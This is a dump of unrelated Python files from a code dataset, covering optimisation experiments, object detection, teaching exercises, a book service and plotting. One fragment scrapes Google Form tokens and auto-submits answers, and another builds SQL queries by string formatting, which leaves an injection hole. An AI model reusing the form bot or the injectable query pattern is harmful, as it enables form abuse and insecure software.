answer_list [0] [0]\n add (answer_id, selected)\n print (f\"DETECTED TERTIARY BREAKOUT SELECT, returning {selected}\")\n elif \"future\" in lower_name and type_is (\"paragraph\"):\n add (answer_id, info [4])\n print (f\"DETECTED FUTURE, returning {info [4]}\")\n elif is_yes_no ():\n add (answer_id, \"No\")\n print (f\"DETECTED OTHER YES/NO, returning no\")\n else:\n print (\"NO IDEA\")\n print (\"#\" * 10)\n\n # Get token\n script_tags = list (html.find_all (\"script\"))\n TOKEN_BEGINNING = \"_docs_flag_initialData=\"\n TOKEN_END = \";\"\n script_tag = None\n for potential_script_tag in script_tags:\n if potential_script_tag.string is None: continue\n if potential_script_tag.string.startswith (TOKEN_BEGINNING):\n script_tag = potential_script_tag\n break\n if script_tag is None: raise Exception (\"Couldn't find script tag\")\n script_tag_text = script_tag.string\n token_json = script_tag_text [len (TOKEN_BEGINNING):(len (script_tag_text) - len (TOKEN_END))]\n token_data = json.loads (token_json)\n print (f\"Extracted token: {token_data ['info_params'] ['token']}\")\n\n input_tags = list (html.find_all (\"input\"))\n freebird_submission_token = None\n for input_tag in input_tags:\n if input_tag [\"type\"] != \"hidden\": continue\n if input_tag [\"name\"] != \"fbzx\": continue\n freebird_submission_token = input_tag [\"value\"]\n if freebird_submission_token is None: raise Exception (\"Couldn't find fbzx\")\n print (f\"Extracted fbzx: {freebird_submission_token}\")\n\n response_body [\"emailReceipt\"] = \"\"\n response_body [\"fvv\"] = \"1\"\n response_body [\"token\"] = token_data [\"info_params\"] [\"token\"]\n response_body [\"fbzx\"] = freebird_submission_token\n response_body [\"draftResponse\"] = json.dumps ([draft, None, freebird_submission_token, None, None, None, info [0], 0])\n response_body [\"pageHistory\"] = ','.join (str (page_number) for page_number in range (section_count))\n pprint (response_body)\n\n response = requests.post (f\"https://docs.google.com/forms/d/e/{token}/formResponse\", cookies = jar, data = response_body)\n print (response)\n","repo_name":"an0ndev/Gamer_Code","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":8383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36955661467","text":"\"\"\"\nupdated\nEF21 with bidirectional compression\nexperiment for logistic regression function with non-convex regularizer\n\"\"\"\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport time\nimport sys\nimport os\nimport argparse\nfrom numpy.random import normal, uniform\nfrom sklearn.datasets import make_spd_matrix, make_sparse_spd_matrix, load_svmlight_file, dump_svmlight_file\nfrom numpy.linalg import norm\nimport itertools\nfrom scipy.special import binom\nfrom scipy.stats import ortho_group\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, accuracy_score\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport math\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_svmlight_file\nimport datetime\nfrom IPython import display\nfrom logreg_functions_fast import *\n\n#np.random.seed(23)\ndef myrepr(x):\n return repr(round(x, 4)).replace('.',',') if isinstance(x, float) else repr(x)\n\ndef stopping_criterion(sq_norm, eps, it, Nsteps):\n #return (R_k > eps * R_0) and (it <= Nsteps)\n return (it <= Nsteps) and (sq_norm >=eps)\n\ndef top_k_matrix (X,k):\n output = np.zeros(X.shape)\n for i in range (X.shape[0]):\n output[i] = top_k_compressor(X[i],k)\n return output\n \ndef top_k_compressor(x, k):\n output = np.zeros(x.shape)\n x_abs = np.abs(x)\n idx = np.argpartition(x_abs, -k)[-k:] # Indices not sorted\n inds = idx[np.argsort(x_abs[idx])][::-1]\n output[inds] = x[inds]\n return output\n\ndef compute_full_grads (A, x, b, la,n_workers):\n grad_ar = np.zeros((n_workers, x.shape[0]))\n for i in range(n_workers):\n grad_ar[i] = logreg_grad(x, A[i], b[i], la).copy()\n return grad_ar\n\ndef ef21_worker_compressor(A, x, b, la, k, wg_ar, n_workers):\n grads = compute_full_grads(A, x, b, la, n_workers)\n assert(grads.shape==(n_workers,x.shape[0]))\n wg_ar_new = np.zeros((n_workers, x.shape[0]))\n delta = grads - wg_ar\n wg_ar_new = wg_ar + top_k_matrix(delta, k)\n size_value_sent = 32\n return wg_ar_new, size_value_sent, np.mean(grads, axis=0)\n\ndef ef21_master_compressor(wg, g, k):\n delta = wg - g\n g_new = g + top_k_compressor(delta, k)\n return g_new\n\ndef ef21_bc(x_0, A, b, A_0, b_0, stepsize, eps,la, k_od, k_bd, n_workers, experiment_name, project_path, dataset, Nsteps=100000):\n wg_ar = compute_full_grads(A, x_0, b, la, n_workers)\n g = np.mean(wg_ar, axis=0)\n sq_norm_ar = [np.linalg.norm(x=g, ord=2) ** 2]\n its_bits_od_ar = [0]\n its_bits_bd_ar = [0]\n it_comm_ar = [0]\n x = x_0.copy()\n it = 0\n PRINT_EVERY = 1000\n while stopping_criterion(sq_norm_ar[-1], eps, it, Nsteps):\n x = x - stepsize*g \n wg_ar, size_value_sent, grad = ef21_worker_compressor(A, x, b, la, k_od, wg_ar, n_workers)\n wg = np.mean(wg_ar, axis=0)\n g = ef21_master_compressor(wg, g, k_bd)\n sq_norm_ar.append(np.linalg.norm(x=grad, ord=2) ** 2)\n it += 1\n its_bits_od_ar.append(it*k_od*size_value_sent)\n its_bits_bd_ar.append(it*(k_od+k_bd)*size_value_sent)\n it_comm_ar.append(it)\n if it%PRINT_EVERY ==0:\n display.clear_output(wait=True)\n print(it, sq_norm_ar[-1])\n its_bits_od_ef21_bc = np.array(its_bits_od_ar)\n its_bits_bd_ef21_bc = np.array(its_bits_bd_ar)\n its_comm_ef21_bc = np.array(it_comm_ar)\n norms_ef21_bc = np.array(sq_norm_ar)\n sol_ef21_bc = x.copy()\n its_epochs_ef21_bc = its_comm_ef21_bc.copy()\n\n save_data(its_bits_od_ef21_bc, its_bits_bd_ef21_bc, its_epochs_ef21_bc, its_comm_ef21_bc, norms_ef21_bc, sol_ef21_bc, k_od, k_bd, experiment_name, project_path, dataset)\n return np.array(its_bits_od_ar), np.array(its_bits_bd_ar), np.array(it_comm_ar), np.array(sq_norm_ar), x\n\ndef save_data(its_bits_od, its_bits_bd, its_epochs, its_comm, f_grad_norms, x_solution, k_od, k_bd, experiment_name, project_path, dataset):\n experiment = '{0}_{1}_{2}'.format(experiment_name, k_od, k_bd)\n logs_path = project_path + \"logs/logs_{0}_{1}/\".format(dataset, experiment)\n \n if not os.path.exists(project_path + \"logs/\"):\n os.makedirs(project_path + \"logs/\")\n \n if not os.path.exists(logs_path):\n os.makedirs(logs_path)\n\n np.save(logs_path + 'iteration_bits_od' + '_' + experiment, np.array(its_bits_od))\n np.save(logs_path + 'iteration_bits_bd' + '_' + experiment, np.array(its_bits_bd))\n np.save(logs_path + 'iteration_epochs' + '_' + experiment, np.array(its_epochs))\n np.save(logs_path + 'iteration_comm' + '_' + experiment, np.array(its_comm))\n np.save(logs_path + 'solution' + '_' + experiment, x_solution)\n np.save(logs_path + 'norms' + '_' + experiment, np.array(f_grad_norms))\n\n\nparser = argparse.ArgumentParser(description='Run top-k algorithm')\nparser.add_argument('--max_it', action='store', dest='max_it', type=int, default=None, help='Maximum number of iteration')\nparser.add_argument('--k_od', action='store', dest='k_od', type=int, default=1, help='Worker-master compresion parameter')\nparser.add_argument('--k_bd', action='store', dest='k_bd', type=int, default=1, help='Master-worker compresion parameter')\nparser.add_argument('--num_workers', action='store', dest='num_workers', type=int, default=1, help='Number of workers that will be used')\nparser.add_argument('--factor', action='store', dest='factor', type=float, default=1, help='Stepsize factor')\nparser.add_argument('--tol', action='store', dest='tol', type=float, default=1e-5, help='tolerance')\nparser.add_argument('--dataset', action='store', dest='dataset', type=str, default='mushrooms',help='Dataset name for saving logs')\n\nargs = parser.parse_args()\nnsteps = args.max_it\nk_od = args.k_od\nk_bd = args.k_bd\nn_w = args.num_workers\ndataset = args.dataset\nloss_func = \"log-reg\"\nfactor = args.factor\neps = args.tol\n'''\nnsteps = 2000\nn_w = 20\ndataset = \"phishing\"\nloss_func = \"log-reg\"\nfactor = 1.0\neps = 1e-9\nk_od = 1\nk_bd = 1\n'''\nla = 0.1\n\nuser_dir = os.path.expanduser('~/')\nproject_path = os.getcwd() + \"/\"\n\ndata_path = project_path + \"data_{0}/\".format(dataset)\n\nif not os.path.exists(data_path):\n os.mkdir(data_path)\n\nX_0 = np.load(data_path + 'X.npy') #whole dateset\ny_0 = np.load(data_path + 'y.npy')\n\nn_0, d_0 = X_0.shape\n\nhess_f_0 = (1 / (4*n_0)) * (X_0.T @ X_0) + 2*la*np.eye(d_0)\nL_0 = np.max(np.linalg.eigvals(hess_f_0))\nL_0 = L_0.astype(np.float)\n\n#c = subprocess.call(f\"python3 generate_data.py --dataset mushrooms --num_starts 1 --num_workers {n_w} --loss_func log-reg --is_homogeneous 0\", shell=True)\nX = []\ny = []\nL = np.zeros(n_w)\nn = np.zeros(n_w, dtype=int)\nd = np.zeros(n_w, dtype=int)\nfor j in range(n_w):\n X.append(np.load(data_path + 'X_{0}_nw{1}_{2}.npy'.format(dataset, n_w, j)))\n y.append(np.load(data_path + 'y_{0}_nw{1}_{2}.npy'.format(dataset, n_w, j)))\n n[j], d[j] = X[j].shape\n\n currentDT = datetime.datetime.now()\n print (currentDT.strftime(\"%Y-%m-%d %H:%M:%S\"))\n print (X[j].shape)\n\n hess_f_j = (1 / (4*n[j])) * (X[j].T @ X[j]) + 2*la*np.eye(d[j])\n L[j] = np.max(np.linalg.eigvals(hess_f_j))\nL = L.astype(np.float)\n\nif not os.path.isfile(data_path + 'w_init_{0}.npy'.format(loss_func)):\n # create a new w_0\n x_0 = np.random.normal(loc=0.0, scale=1.0, size=d_0)\n np.save(data_path + 'w_init_{0}.npy'.format(loss_func), x_0)\n x_0 = np.array(np.load(data_path + 'w_init_{0}.npy'.format(loss_func)))\nelse:\n # load existing w_0\n x_0 = np.array(np.load(data_path + 'w_init_{0}.npy'.format(loss_func)))\n\nal = k_od/d_0\nt = -1 + np.sqrt(1/(1-al))\ntheta = 1 - (1 - al)*(1 + t)\nbeta = (1 - al)*(1 + 1/t)\nLt = np.sqrt (np.mean (L**2))\nstep_size_diana_tpc = (1/(L_0 + Lt*np.sqrt(beta/theta)))*factor\n\nexperiment_name = \"ef21-bc_nw-{0}_{1}x\".format(n_w, myrepr(factor))\n\nresults = ef21_bc(x_0, X, y, X_0, y_0, step_size_diana_tpc, eps,la, k_od, k_bd, n_w,experiment_name, project_path, dataset, Nsteps=nsteps)\nprint (experiment_name + f\" with k={k_od} finished in {results[0].shape[0]} iterations\" )\nits_bits_od_ef21_bc = results[0]\nits_bits_bd_ef21_bc = results[1]\nits_comm_ef21_bc = results[2]\nnorms_ef21_bc = results[3]\nsol_ef21_bc = results[4]\nits_epochs_ef21_bc = its_comm_ef21_bc.copy()\n\nsave_data(its_bits_od_ef21_bc, its_bits_bd_ef21_bc, its_epochs_ef21_bc, its_comm_ef21_bc, norms_ef21_bc, sol_ef21_bc, k_od, k_bd, experiment_name, project_path, dataset)\n","repo_name":"IgorSokoloff/ef21_b-w_experiements_source_code","sub_path":"Logistic regression/ef21_bc.py","file_name":"ef21_bc.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72927548214","text":"# a² = b² + c²\n# Onde: a: representa a hipotenusa; \n# b e c: representa os catetos oposto e adjacente.\n\nfrom math import sqrt\n\ncateto_opo = int(input('O valor do cateto oposto é:'))\ncateto_adj = int(input('O valor do cateto adjacente é: '))\n\nhipotenusa = sqrt((cateto_opo**2) + (cateto_adj**2))\n\nprint('O comprimento da hipotenusa é {}'.format(hipotenusa))\n\n\n# math.hypot(cateto_opo, cateto_adj) ","repo_name":"annecaroline00/python-3---mundo-1","sub_path":"módulos/desafio017.py","file_name":"desafio017.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22575895335","text":"import cv2\nimport tensorflow as tf\nimport numpy as np\nimport os,time\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_utils\nimport json\nfrom json import encoder\nimport pymysql\n\n\n\nclass my_object_detect(object):\n def gen():\n db = pymysql.connect(host='192.168.0.177', user='root', password = '4321', db='mysql', charset='utf8')\n cur=db.cursor()\n\n cap = cv2.VideoCapture(0,cv2.CAP_V4L)\n cap.set(3, 640) # set Width\n cap.set(4, 480) # set Height\n cap.set(5, 10) # set frame\n\n\n # Init tf model\n\n MODEL_NAME = 'ssdlite_mobilenet_v2_coco_2018_05_09' #fast\n PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb' \n PATH_TO_LABELS = os.path.join('data', 'mscoco_label_map.pbtxt') \n NUM_CLASSES = 90 \n\n fileAlreadyExists = os.path.isfile(PATH_TO_CKPT) \n\n if not fileAlreadyExists:\n print('Model does not exsist !')\n exit\n\n # LOAD GRAPH\n print('Loading...')\n detection_graph = tf.Graph() \n with detection_graph.as_default(): \n od_graph_def = tf.compat.v1.GraphDef()\n with tf.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid: \n serialized_graph = fid.read() \n od_graph_def.ParseFromString(serialized_graph) \n tf.import_graph_def(od_graph_def, name='')\n label_map = label_map_util.load_labelmap(PATH_TO_LABELS)\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True) \n category_index = label_map_util.create_category_index(categories)\n print('Finish Load Graph..')\n\n print(type(category_index))\n print(\"dict['Name']: \", category_index[1]['name'])\n\n t_start=time.time()\n fps=0\n\n with detection_graph.as_default():\n with tf.compat.v1.Session(graph=detection_graph) as sess:\n while True:\n success, frame = cap.read()\n image_np_expanded = np.expand_dims(frame, axis=0) \n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0') \n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0') \n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0') \n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0') \n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n # print('Running detection..') \n (boxes, scores, classes, num) = sess.run( \n [detection_boxes, detection_scores, detection_classes, num_detections], \n feed_dict={image_tensor: image_np_expanded})\n\n # print('Done. Visualizing..')\n vis_utils.visualize_boxes_and_labels_on_image_array(\n frame,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=8)\n\n for i in range(0, 10):\n if scores[0][i] >= 0.5:\n name=category_index[int(classes[0][i])]['name']\n print(name)\n\n\n\n fps = fps + 1\n mfps = fps / (time.time() - t_start)\n cv2.putText(frame, \"FPS \" + str(int(mfps)), (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 2)\n ret,jpeg = cv2.imencode('.jpg', frame)\n img= jpeg.tobytes()\n\n\n sql=\"INSERT INTO object(NAME) VALUES('\"'+%s+'\"')\" %name \n cur.execute(sql)\n db.commit()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + img + b'\\r\\n\\r\\n')\n\t","repo_name":"nameissh/rc_car_project","sub_path":"my_object_detect.py","file_name":"my_object_detect.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6786259850","text":"# Syntax is as follows\n\nmylist = [1,2,3]\n\nfor num in mylist:\n print(num)\n\n# Only print even numbers\nfor num in mylist:\n if num % 2 == 0:\n print(num)\n\n# If you plan on not using the actual member, use _\nfor _ in mylist:\n print(\"Not related\")\n\n\nmylist = [(1,2), (3,4), (5,6), (7,8)] # List of 4 tuples\n\n# Tuple unpacking, where you duplicate the structure of tuples and print the individual numbers\nfor a,b in mylist:\n print(a)\n print(b)\n\nmylist = [(1,2,3), (4,5,6), (7,8,9)]\n\nfor a,b,c in mylist:\n print(b)\n\nd = { 'k1':1, 'k2':2, 'k3':3}\n\n# Only iterates through keys\nfor item in d:\n print(item)\n\nfor key,value in d.items():\n print(key)\n print(value)\n\n# While loops\n\nwhile x < 5:\n x += 1\nelse: \n print(\"This executes when the while loop finally is not true\")\n\n# Break breaks out of closest enclosing loop\n# Continue goes to the top of the closes enclosing loop\n# Pass does nothing\n\n\nx = [1,2,3]\n\nfor item in x:\n pass # Essentially is a placeholder to avoid a syntax error\n # comment (Will get error without a pass)\n\nmystring = \"Sean\"\n\nfor letter in mystring:\n if letter == 'a':\n continue # Will skip the print if the letter is a, but will continue looping\n print(letter)\n\nfor letting in mystring:\n if letter == 'a':\n break # Will completely stop loop\n print(letter)","repo_name":"smarten-bootcamp/notes","sub_path":"python/statements/for-loop.py","file_name":"for-loop.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26156868980","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom classic.app import DTO\nfrom classic.aspects import PointCut\nfrom classic.components import component\nfrom classic.messaging import Message, Publisher\nfrom pydantic import validate_arguments\n\nfrom application import interfaces, dataclasses\nfrom application.exceptions import DoesNotExists\n\njoin_points = PointCut()\njoin_point = join_points.join_point\n\n\nclass BookInfo(DTO):\n id: Optional[int]\n title: str\n description: str\n user_id: Optional[int]\n\n\n@component\nclass Book:\n books_repo: interfaces.BooksRepo\n publisher: Publisher\n\n @join_point\n @validate_arguments\n def get_books(self):\n books = self.books_repo.get_books()\n if not books:\n raise DoesNotExists\n return books\n\n @join_point\n @validate_arguments\n def get_book(self, id):\n book = self.books_repo.get_book(id)\n if not book:\n raise DoesNotExists\n return book\n\n @join_point\n @validate_arguments\n def delete_book(self, id):\n try:\n self.books_repo.get_book(id)\n except Exception:\n raise DoesNotExists\n self.books_repo.delete_book(id)\n\n @join_point\n @validate_arguments\n def add_book(self, title, description):\n book = BookInfo(title=title, description=description).create_obj(dataclasses.Book)\n self.books_repo.add_book(book)\n\n if self.publisher:\n self.publisher.plan(\n Message('test', {'event': 'add_book', 'created': datetime.now(),\n 'book_id': book.id, 'user_id': None})\n )\n\n @join_point\n @validate_arguments\n def take_book(self, id, user_id):\n try:\n book = self.books_repo.get_book(id)\n except Exception:\n raise DoesNotExists\n else:\n book_info = BookInfo(id=id, title=book.title, description=book.description, user_id=user_id)\n book_info.populate_obj(book)\n\n if self.publisher:\n self.publisher.plan(\n Message('test', {'event': 'take_book', 'created': datetime.now(),\n 'book_id': id, 'user_id': user_id})\n )\n return book\n\n @join_point\n @validate_arguments\n def return_book(self, id):\n try:\n book = self.books_repo.get_book(id)\n except Exception:\n raise DoesNotExists\n else:\n book_info = BookInfo(id=id, title=book.title, description=book.description, user_id=None)\n book_info.populate_obj(book)\n\n if self.publisher:\n self.publisher.plan(\n Message('test', {'event': 'take_book', 'created': datetime.now(),\n 'book_id': id, 'user_id': None})\n )\n\n return book\n","repo_name":"Atmostone/EvrazProject3","sub_path":"book_backend/application/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35131615509","text":"import cPickle\nimport numpy as np\nimport subprocess as sub\n\nfrom evosoro.softbot import Genotype, Phenotype\nfrom evosoro.tools.utils import make_one_shape_only, hausdorff_dist, bootstrap_ci, count_neighbors\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\nsns.set(color_codes=True, context=\"poster\")\nsns.set_style(\"white\", {'font.family': 'serif', 'font.serif': 'Times New Roman'})\n\ncolors = [\"grey\", \"dark pink\", \"ocean green\", \"tan\"]\nsns.set_palette(sns.xkcd_palette(colors), desat=.9)\n\n\nUSE_PICKLE = True\nGENS = [5000]\nRUNS = 20\nEXP_NAMES = [\"none\", \"stress\", \"pressure\"]\nDIR = \"/home/sam/Projects/research_code/evosoro/data_analysis/results\"\n\n\n# # TEST\n# robots = []\n# for r in range(24):\n# robots += [make_one_shape_only(np.random.randint(0, 2, (10, 10, 10)))]\n#\n# for n, r1 in enumerate(robots):\n# for r2 in robots[n + 1:]:\n# print hausdorff_dist(r1, r2)\n\n\n# if not USE_PICKLE:\n# for gen in GENS:\n# sub.call(\"mkdir {0}/Gen_{1}\".format(DIR, gen), shell=True)\n# for exp_name in EXP_NAMES:\n# for run in range(1, RUNS+1):\n# print gen, exp_name, run\n# sub.call(\"scp skriegma@bluemoon-user1.uvm.edu:/users/s/k/skriegma/scratch/\"\n# \"alpha_{2}_A/run_{3}/pickledPops/Gen_{1}.pickle \"\n# \" {0}/Gen_{1}/{2}_Run_{3}.pickle\".format(DIR, gen, exp_name, run),\n# shell=True)\n\n\nMyGenotype = Genotype\nMyPhenotype = Phenotype\n\n\nif not USE_PICKLE:\n\n generation = []\n hausdorff = []\n group = []\n\n for gen in GENS:\n\n for exp_idx, exp_name in enumerate(EXP_NAMES):\n\n run_champs = []\n\n for run in range(1, RUNS+1):\n try:\n pickle = '{0}/Gen_{1}/{2}_Run_{3}.pickle'.format(DIR, gen, exp_name, run)\n with open(pickle, 'rb') as handle:\n [optimizer, random_state, numpy_random_state] = cPickle.load(handle)\n\n pop = optimizer.pop\n\n best_ind = None\n for ind in pop:\n if ind.fitness == pop.best_fit_so_far:\n best_ind = ind\n\n run_champs += [best_ind]\n except IOError:\n pass\n\n distances = []\n\n for n, ind1 in enumerate(run_champs):\n for name, details in ind1.genotype.to_phenotype_mapping.items():\n if name == \"material_present\":\n g1 = details[\"state\"]\n\n g1_90 = np.rot90(g1, k=1, axes=(0, 1))\n g1_180 = np.rot90(g1, k=2, axes=(0, 1))\n g1_270 = np.rot90(g1, k=3, axes=(0, 1))\n rotations_of_ind1 = [g1, g1_90, g1_180, g1_270]\n rotations_of_ind1 += [np.rot90(x, k=1, axes=(0, 2)) for x in rotations_of_ind1]\n\n for ind2 in run_champs[n+1:]:\n for name, details in ind2.genotype.to_phenotype_mapping.items():\n if name == \"material_present\":\n g2 = details[\"state\"]\n\n min_dist = np.inf\n for this_rot in rotations_of_ind1:\n d = hausdorff_dist(this_rot, g2)\n if d < min_dist:\n min_dist = d\n\n distances += [min_dist]\n\n # append to plot data\n hausdorff += distances\n group += [exp_idx]*len(distances)\n generation += [gen] * len(distances)\n\n # # statistics\n # l, u = bootstrap_ci(distances, np.median, n=1000, ci=95)\n # print exp_name, (l, u)\n\n # PLOTTING\n generation = np.array(generation)\n group = np.array(group)\n hausdorff = np.array(hausdorff)\n data = np.array([generation, group, hausdorff])\n\n df = pd.DataFrame(data=data.T, columns=[\"Gen\", \"Group\", \"Distance\"])\n\n # save dataframe\n with open('{0}/Run_Champ_Hausdorff.pickle'.format(DIR), 'wb') as handle:\n cPickle.dump(df, handle, protocol=cPickle.HIGHEST_PROTOCOL)\n\nelse:\n # load original fitness\n with open('{0}/Run_Champ_Hausdorff.pickle'.format(DIR), 'rb') as handle:\n df = cPickle.load(handle)\n\ndf = df[df['Gen'] == 5000]\n\nfig, ax = plt.subplots(1, 1, figsize=(4.05, 4))\n\ng = sns.barplot(x=\"Group\", y=\"Distance\", data=df, ax=ax, capsize=0.1, errwidth=2, ci=95, alpha=0.75)\n\n# # statistical annotation\n# text = r\"${\\ast}{\\ast}{\\ast}$\"\n# x1, x2 = 1, 2\n# y, h, col = 4.2, 0.15, 'k'\n# plt.plot([x1, x1, x2, x2], [y, y+h, y+h, y], lw=1.5, c=col)\n# plt.text((x1+x2)*.5, y+h, text, ha='center', va='bottom', color=col, fontsize=14)\n\nax.set_ylim([0, 5])\nax.set_yticks(range(6))\nfor tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(12)\nax.set_ylabel(\"$\\mathregular{d_H}$\", fontsize=18, fontweight=\"bold\")\nax.set_xticklabels([\"None\", \"Stress\", \"Press\"], fontsize=14, fontweight=\"bold\")\nax.set_xlabel(\"\") # \"At generation {}\".format(GEN))\nax.set_title(\"Geometric diversity\", fontsize=14)\n# ax.legend_.remove()\n# ax.legend([matplotlib.patches.Patch(color=sns.color_palette()[i]) for i in range(3)],\n# ['None', 'Stress', 'Pressure'], loc=1)\n\n\nc = sns.color_palette()[3]\nplt.text(ax.get_xlim()[0]+0.07, ax.get_ylim()[1]*(1-0.0094/0.4), \"B\", ha='left', va='top', color=\"k\",\n fontsize=25, fontname=\"Arial\", bbox=dict(facecolor=c, edgecolor=c, alpha=0.5))\n\n# sns.despine()\nplt.tight_layout()\nplt.savefig(\"plots/Hausdorff.pdf\", bbox_inches='tight')\n\n","repo_name":"skriegman/2018-gecco","sub_path":"evosoro/data_analysis/hausdorff.py","file_name":"hausdorff.py","file_ext":"py","file_size_in_byte":5635,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"2999584511","text":"class ShortInputException(Exception):\n '''A user-defined exception class.'''\n def __init__(self, length, atleast):\n Exception.__init__(self)\n self.length = length\n self.atleast = atleast\n\ntry:\n text = input('Enter something: ')\n if len(text) < 3:\n raise ShortInputException(len(text), 3)\n \nexcept ShortInputException as my_ex:\n print(my_ex.length, my_ex.atleast)\n\nelse:\n print('No exception was raised.')\n\n\nprint(\"End of app\")\n\n\"\"\"\n\n\nOUTPUT 1:\n_________________________________________\nEnter something: t\n1 , 3\nEnd of app\n\n\nOUTPUT 2:\n_________________________________________\nEnter something: te\n2 , 3\nEnd of app\n\n\nOUTPUT 3:\n_________________________________________\nEnter something: test\nNo exception was raised.\nEnd of app\n\n\n\"\"\"\n","repo_name":"shadibdair/Python","sub_path":"Day 11 - 02.01.2019/09_except with as.py","file_name":"09_except with as.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41844723020","text":"\"\"\"\nEvolve a control/reward estimation network for the Moon Lander example from OpenAI Gym.\nLunarLander-v2 environment (https://gym.openai.com/envs/LunarLander-v2).\nSample run here: https://gym.openai.com/evaluations/eval_FbKq5MxAS9GlvB7W6ioJkg\n\"\"\"\nimport multiprocessing\nimport os\nimport pickle\nimport random\nimport sys\nimport time\nfrom collections import namedtuple\n\nimport neat\nimport gym.wrappers\nimport numpy as np\n\nimport util.argparsing as argutils\nimport util.reporters as reporters\nimport gymex.visualize as visualize\nfrom gymex.config import make_config\n\nNUM_CORES = os.cpu_count()\nif hasattr(os, \"sched_getaffinity\"):\n # This function is only available on certain platforms. When running with Slurm, it can tell us the true number of\n # cores we have access to.\n NUM_CORES = len(os.sched_getaffinity(0))\n\n\ndef take_step(env, observation, networks, random_action_prob=0.0):\n if not isinstance(networks, (tuple, list)):\n networks = [networks]\n assert len(networks) > 0 and networks[0] is not None\n\n # Run the networks.\n num_outputs = len(networks[0].output_nodes)\n all_actions = np.zeros((len(networks), num_outputs))\n for i, n in enumerate(networks):\n all_actions[i] = n.activate(observation)\n\n # Choose an action.\n if random.random() < random_action_prob:\n # Take a random action with some probability.\n action = env.action_space.sample()\n else:\n if isinstance(env.action_space, gym.spaces.Discrete):\n # Make a choice from a discrete set of actions. If multiple networks, take the action with the highest\n # total value.\n # TODO: Maybe vote instead of summing reward estimates?\n action = np.argmax(all_actions.sum(axis=0))\n elif isinstance(env.action_space, gym.spaces.Box):\n # Output a continuous action. If multiple networks, average them.\n action = all_actions.mean(axis=0)\n else:\n raise RuntimeError(f\"Unsupported action space: {env.action_space}\")\n\n observation, reward, terminated, truncated, info = env.step(action)\n return all_actions, action, observation, reward, (terminated or truncated), info\n\n\ndef compute_reward_prediction_error(args):\n genome, net, episodes, reward_range, use_reward_discount = args\n\n if use_reward_discount:\n m = int(round(np.log(0.01) / np.log(genome.discount)))\n discount_function = [genome.discount ** (m - i) for i in range(m + 1)]\n else:\n m = None\n discount_function = None\n\n reward_error = []\n for ep in episodes:\n # Compute normalized discounted reward.\n if use_reward_discount:\n rewards = np.convolve(ep.rewards, discount_function)[m:]\n else:\n rewards = ep.rewards.copy()\n if reward_range:\n # NOTE: This is done knowing that we are usually using networks whose outputs are clamped to [-1, 1].\n # So we need targets in the same range.\n min_reward, max_reward = reward_range\n rewards = 2 * (rewards - min_reward) / (max_reward - min_reward) - 1.0\n rewards = np.clip(rewards, -1.0, 1.0)\n\n for obs, act, dr in zip(ep.observations, ep.actions, rewards):\n output = net.activate(obs)\n reward_error.append(float((output[act] - dr) ** 2)) # squared error from discounted reward value???\n # TODO: This is extremely vulnerable to strange minima. We need to do more than simply predict the reward of\n # TODO: our own policy.\n\n return np.mean(reward_error)\n\n\nEpisode = namedtuple(\"Episode\", [\"observations\", \"actions\", \"rewards\"])\n\n\ndef run_sim_episodes(args):\n net, gym_config = args\n env = gym.make(gym_config.env_id)\n episodes = []\n for _ in range(gym_config.num_fitness_episodes):\n observation, _ = env.reset()\n observations = []\n actions = []\n rewards = []\n while True:\n _, action, observation, reward, done, _ = take_step(env, observation, net,\n gym_config.random_action_prob)\n observations.append(observation)\n actions.append(action)\n rewards.append(reward)\n\n if done:\n break\n\n observations = np.array(observations)\n actions = np.array(actions)\n rewards = np.array(rewards)\n episodes.append(Episode(observations, actions, rewards))\n\n return episodes\n\n\nclass PooledErrorCompute(object):\n\n def __init__(self, gym_config, pool=None):\n self.gym_config = gym_config\n self.pool = pool\n self.generation = 0\n self.test_episodes = []\n\n def simulate(self, nets, gym_config):\n msg = f\"Simulating {len(nets)} nets in {gym_config.num_fitness_episodes} episodes\"\n jobs = [(net, gym_config) for _, net in nets]\n if self.pool:\n print(msg 